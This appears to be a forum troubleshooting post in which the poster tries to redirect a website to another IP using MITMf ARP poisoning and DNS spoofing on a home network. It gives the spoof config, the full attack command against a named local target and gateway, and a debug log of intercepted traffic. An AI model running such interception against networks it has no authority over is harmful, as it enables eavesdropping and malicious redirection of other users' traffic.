I'm trying to redirect a page from taulukko.com to google.com for learning purposes, but without success.
When I access taulukko.com from the spoofed node I get:
The webpage cannot be found
My mitmf.conf:
#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
#can also be a comma separated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
#*.thesprawls.org=192.0.2.1
*.taulukko.com=201.55.233.116
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
[[[MX]]] # Queries for mail server records
*.thesprawl.org=mail.fake.com
[[[NS]]] # Queries for mail server records
*.thesprawl.org=ns.fake.com
[[[CNAME]]] # Queries for alias records
*.thesprawl.org=www.fake.com
[[[TXT]]] # Queries for text records
*.thesprawl.org=fake message
[[[PTR]]] # PTR queries
*.2.0.192.in-addr.arpa=fake.com
[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:[email protected]! .
[[[SRV]]] #FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
The command:
mitmf -i wlan0 --spoof --arp --dns --gateway 192.168.0.1 --target 192.168.0.16 --log debug
The debug output:
2016-02-20 18:05:47 [Utils] Setting iptables DNS redirection rule from port 53 to 53
2016-02-20 18:05:47 [Utils] Setting ip forwarding to 1
2016-02-20 18:05:47 [Utils] Flushing iptables
2016-02-20 18:05:47 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2016-02-20 18:05:47 [ARPpoisoner] gatewayip => 192.168.0.1
2016-02-20 18:05:47 [ARPpoisoner] gatewaymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] targets => ['192.168.0.16']
2016-02-20 18:05:47 [ARPpoisoner] targetmac => None
2016-02-20 18:05:47 [ARPpoisoner] mymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] interface => wlan0
2016-02-20 18:05:47 [ARPpoisoner] arpmode => rep
2016-02-20 18:05:47 [ARPpoisoner] interval => 3
2016-02-20 18:05:47 [ProxyPlugins] Adding Spoof plugin
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:47 [SMBserver] Callback added for UUID X-X-X-X-X V:3.0
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:49 [ClientRequest] Resolving host: www.taulukko.com
2016-02-20 18:05:49 [ClientRequest] Host not cached.
2016-02-20 18:05:49 [ClientRequest] Resolving with DNSChef
2016-02-20 18:05:49 [ClientRequest] Resolved host successfully: www.taulukko.com -> 201.55.233.116
2016-02-20 18:05:49 [ClientRequest] Zapped encoding
2016-02-20 18:05:49 [ClientRequest] Sending request via HTTP
2016-02-20 18:05:49 [ServerConnection] HTTP connection made.
2016-02-20 18:05:49 [ProxyPlugins] hooking connectionMade()
2016-02-20 18:05:49 192.168.0.16 [type:IE 8.0 os:Windows 7] Sending Request: www.taulukko.com
2016-02-20 18:05:49 [ServerConnection] Full request: www.taulukko.com/
2016-02-20 18:05:49 [ServerConnection] Sending header: (host: www.taulukko.com)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept-language: en-US)
2016-02-20 18:05:49 [ServerConnection] Sending header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*)
2016-02-20 18:05:49 [ServerConnection] Sending header: (user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0))
2016-02-20 18:05:49 [ServerConnection] Server response: HTTP/1.0 404 Not Found
2016-02-20 18:05:49 [ProxyPlugins] hooking handleEndHeaders()
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-xss-protection: 1; mode=block)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (server: HTTP server (unknown))
2016-02-20 18:05:49 [ServerConnection] Receiving header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (date: Sat, 20 Feb 2016 20:05:49 GMT)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (content-type: text/html)
2016-02-20 18:05:49 [ProxyPlugins] hooking handleResponse()
2016-02-20 18:05:49 [ServerConnection] Read from server 49 bytes of data
2016-02-20 18:05:54 [ARPpoisoner] Restoring connection 192.168.0.16 <-> 192.168.0.1 with 2 packets per host
2016-02-20 18:05:54 [Utils] Flushing iptables
2016-02-20 18:05:54 [Utils] Setting ip forwarding to 0